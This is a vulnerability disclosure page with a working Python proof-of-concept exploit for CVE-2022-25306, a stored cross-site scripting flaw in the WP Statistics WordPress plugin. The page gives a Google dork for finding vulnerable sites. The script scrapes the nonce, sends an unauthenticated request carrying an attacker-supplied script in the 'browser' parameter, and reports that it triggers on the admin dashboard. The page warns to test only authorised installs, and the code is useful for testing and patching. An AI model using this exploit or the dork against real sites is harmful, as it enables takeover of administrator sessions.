Vulnerable File: /wp-content/plugins/wp-statistics/includes/class-wp-statistics-visitor.php and others
Vulnerable Parameters
browser
Google Dork
inurl:/wp-content/plugins/wp-statistics
CVE
CVE-2022-25306
Proof of Concept (Python 3; needs the third-party `requests` package — run only against WordPress installs you own or are explicitly authorised to test)
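import json
import re
import sys
import urllib.parse
from random import randint

# PoC for CVE-2022-25306 (WP Statistics): an unauthenticated request to the
# plugin's `hit` REST route stores the attacker-controlled `browser` value,
# which is later rendered in the admin dashboard (stored XSS).
# Only run this against installs you own or are explicitly authorised to test.

# The plugin embeds its nonce in the hit-tracking URL on the public front page.
NONCE_RE = re.compile(r'_wpnonce=(.*?)&wp_statistics_hit')
USER_AGENT = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 "
    "(KHTML, like Gecko) Version/15.2 Safari/605.1.15"
)
HTTP_TIMEOUT = 15  # seconds; the original PoC could hang forever on a silent host


def extract_nonce(page_html: str) -> str:
    """Return the `_wpnonce` value found in the front-page HTML.

    Raises ValueError (rather than the original's opaque AttributeError on
    `None.group`) when the marker is absent — typically the plugin is missing,
    inactive, or a version that no longer emits the nonce in the page.
    """
    match = NONCE_RE.search(page_html)
    if match is None:
        raise ValueError(
            "WP Statistics nonce not found in page (plugin missing, inactive or patched?)"
        )
    return match.group(1)


def random_ipv4() -> str:
    """Return a random dotted-quad for the spoofed `ip` parameter.

    `random` is fine here: the value only has to look like a distinct visitor,
    it is not a secret.
    """
    return '.'.join(str(randint(0, 255)) for _ in range(4))


def build_hit_path(wp_nonce: str, payload: str, ip: str) -> str:
    """Build the REST path that stores `payload` as the visitor's browser string.

    `payload` is the raw XSS string; it is URL-encoded here. The remaining
    parameters mirror the plugin's own tracking request so the hit is accepted.
    """
    encoded = urllib.parse.quote_plus(payload)
    return (
        '/wp-json/wp-statistics/v2/hit'
        f'?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser={encoded}'
        f'&platform=&version=&referred=&ip={ip}&exclusion_match=no&exclusion_reason'
        '&ua=Something&track_all=1&timestamp=11&current_page_type=home'
        '&current_page_id=0&search_query&page_uri=/&user_id=0'
    )


def main() -> None:
    """Prompt for target and payload, fetch the nonce, then send the hit request."""
    import requests  # third-party; imported here so the pure helpers stay importable without it

    # Trailing slash would otherwise produce `https://host//wp-json/...`.
    wpurl = input('\nWordPress URL: ').rstrip('/')
    payload = input('\nPayload: ')

    wp_session = requests.session()
    wp = wp_session.get(wpurl, timeout=HTTP_TIMEOUT)
    wp_nonce = extract_nonce(wp.text)

    headers = {"User-Agent": USER_AGENT}
    exploit_url = wpurl + build_hit_path(wp_nonce, payload, random_ipv4())
    print(f'\nSending XSS payload: {exploit_url}')
    wp = wp_session.get(exploit_url, headers=headers, timeout=HTTP_TIMEOUT)

    # A WAF page or a patched route answers with HTML, not JSON; report that
    # instead of dying in the JSON decoder.
    try:
        data = wp.json()
    except ValueError:
        sys.exit(f'\nNon-JSON response (HTTP {wp.status_code}): {wp.text[:500]}')

    print("\nResponse: \n" + json.dumps(data, sort_keys=True, indent=4))
    print(f'\nXSS will trigger when admin visits WP Statistics Dashboard at {wpurl}/wp-admin/admin.php?page=wps_overview_page or other pages depending on the payload used.')


if __name__ == "__main__":
    main()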